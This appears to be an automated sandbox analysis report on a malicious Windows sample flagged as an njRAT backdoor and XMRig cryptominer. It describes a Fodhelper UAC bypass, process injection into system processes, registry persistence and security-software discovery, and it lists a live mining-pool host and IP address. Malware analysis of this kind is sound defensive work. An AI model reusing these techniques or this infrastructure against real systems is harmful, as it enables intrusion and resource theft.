        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 94_2_0000000140002300
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Code function: 12_2_00007FF6CF6717C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_00007FF6CF6717C0
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: dllhost.exe Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
MITRE ATT&CK Matrix, listed by tactic (the number the report attaches to a technique is given in parentheses):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations; Business Relationships
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain; Trusted Relationship
Execution: Windows Management Instrumentation (111); Native API (11); Command and Scripting Interpreter (22); Scheduled Task/Job (1); PowerShell (1); Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell; Visual Basic
Persistence: Scripting (1); DLL Side-Loading (1); Windows Service (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (31); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Privilege Escalation: Abuse Elevation Control Mechanism (2); DLL Side-Loading (1); Access Token Manipulation (1); Scheduled Task/Job (1); Process Injection (912); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (31); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (2); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1); File Deletion (1); Rootkit (4); Masquerading (11); Modify Registry (1); Virtualization/Sandbox Evasion (231); Access Token Manipulation (1); Process Injection (912); Hidden Files and Directories (2)
Credential Access: Credential API Hooking (1); Input Capture (11); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Discovery: System Time Discovery (1); File and Directory Discovery (1); System Information Discovery (125); Security Software Discovery (441); Process Discovery (1); Virtualization/Sandbox Evasion (231); Application Window Discovery (1); System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery; Local Groups
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
Collection: Archive Collected Data (1); Credential API Hooking (1); Input Capture (11); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection; Local Email Collection
Command and Control: Encrypted Channel (2); Non-Standard Port (1); Non-Application Layer Protocol (1); Application Layer Protocol (1); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy; Internal Proxy
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB; Commonly Used Port
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking; Network Denial of Service; Direct Network Flood

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
Behavior Graph ID: 1528504  Sample: e7WMhx18XN.exe  Start date: 08/10/2024  Architecture: WINDOWS  Score: 100
Start node: DNS pool.hashvault.pro; Sigma detected: Xmrig; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 25 other signatures

Process tree (per node: dropped files, signatures, and the processes it started or injected into):
- e7WMhx18XN.exe: dropped C:\Users\user\AppData\Local\Temp\paint.exe (PE32+), C:\Users\user\...\FodhelperBypassUAC.exe (PE32+), C:\Users\user\AppData\Local\Temp\b.bat (DOS), C:\Users\user\AppData\...\e7WMhx18XN.exe.log (CSV); started cmd.exe, paint.exe, FodhelperBypassUAC.exe
  - cmd.exe: Suspicious powershell command line found; 2 other signatures; started powershell.exe and 4 other processes
    - powershell.exe: dropped C:\Windows\$rbx-onimai2\$rbx-CO2.bat (DOS); Sets debug register (to hijack the execution of another thread); Modifies the context of a thread in another process (thread injection); Suspicious command line found; Found suspicious powershell code related to unpacking or dynamic code loading; started cmd.exe
      - cmd.exe: Suspicious powershell command line found; started powershell.exe, conhost.exe, cmd.exe
        - powershell.exe: started cmd.exe
          - cmd.exe: Suspicious powershell command line found; Suspicious command line found; started powershell.exe, conhost.exe, WMIC.exe and 2 other processes
            - powershell.exe: contacted 147.185.221.22 (ports 54593, 54594, 54595; SALSGIVERUS, United States); Creates autostart registry keys with suspicious values (likely registry only malware); Creates autostart registry keys with suspicious names; Creates an autostart registry key pointing to binary in C:\Windows; 5 other signatures; started three powershell.exe instances and 2 other processes
              - powershell.exe: Injects a PE file into a foreign processes; started conhost.exe, powershell.exe
              - powershell.exe: started conhost.exe, powershell.exe
              - powershell.exe: started conhost.exe, powershell.exe
              - 2 other processes: started conhost.exe (two instances), powershell.exe
    - 4 other processes: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
  - paint.exe: Antivirus detection for dropped file; Machine Learning detection for dropped file; 2 other signatures; started conhost.exe
    - conhost.exe: dropped C:\Users\user\AppData\...\services64.exe (PE32+); started two cmd.exe instances
      - cmd.exe: started services64.exe, conhost.exe
        - services64.exe: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); started conhost.exe
          - conhost.exe: started WerFault.exe
      - cmd.exe: started conhost.exe, schtasks.exe
  - FodhelperBypassUAC.exe: UAC bypass detected (Fodhelper); started cmd.exe
    - cmd.exe: started fodhelper.exe, conhost.exe
      - fodhelper.exe: started cmd.exe
        - cmd.exe: started conhost.exe
- services64.exe: Antivirus detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 2 other signatures; started conhost.exe
  - conhost.exe: dropped C:\Users\user\AppData\...\sihost64.exe (PE32+), C:\Users\user\AppData\Roaming\...\WR64.sys (PE32+); Found strings related to Crypto-Mining; Injects code into the Windows Explorer (explorer.exe); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 2 other signatures; started 2 other processes
    - 2 other processes: contacted pool.hashvault.pro (45.76.89.70, ports 54464, 80; AS-CHOOPAUS, United States); Antivirus detection for dropped file; Query firmware table information (likely to detect VMs); Machine Learning detection for dropped file; 4 other signatures; started conhost.exe
- powershell.exe: Modifies the context of a thread in another process (thread injection); Injects a PE file into a foreign processes; started dllhost.exe, conhost.exe
  - dllhost.exe: Contains functionality to inject code into remote processes; 2 other signatures; injected winlogon.exe
- 10 other processes: Suspicious powershell command line found; Query firmware table information (likely to detect VMs); Changes security center settings (notifications, updates, antivirus, firewall); started dllhost.exe, powershell.exe and 14 other processes
  - dllhost.exe: Creates a thread in another existing process (thread injection); injected lsass.exe
  - powershell.exe: started cmd.exe
    - cmd.exe: started 3 other processes
  - 14 other processes: started 3 other processes
    - 3 other processes: started conhost.exe and 5 other processes

Submitted sample

Source | Detection | Scanner | Label
e7WMhx18XN.exe | 53% | ReversingLabs | ByteCode-MSIL.Backdoor.njRAT
e7WMhx18XN.exe | 100% | Avira | TR/Dropper.Gen
e7WMhx18XN.exe | 100% | Joe Sandbox ML |

Dropped files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 100% | Avira | HEUR/AGEN.1344832
C:\Users\user\AppData\Local\Temp\services64.exe | 100% | Avira | HEUR/AGEN.1344202
C:\Users\user\AppData\Local\Temp\paint.exe | 100% | Avira | HEUR/AGEN.1344202
C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\services64.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\paint.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys | 5% | ReversingLabs |
        No Antivirus matches
        No Antivirus matches
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool.hashvault.pro | 45.76.89.70 | true | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1& | svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/ | svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://xmrig.com/wizard%s | conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000000.00000003.1366018989.0000010D91A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367429694.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r= | svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
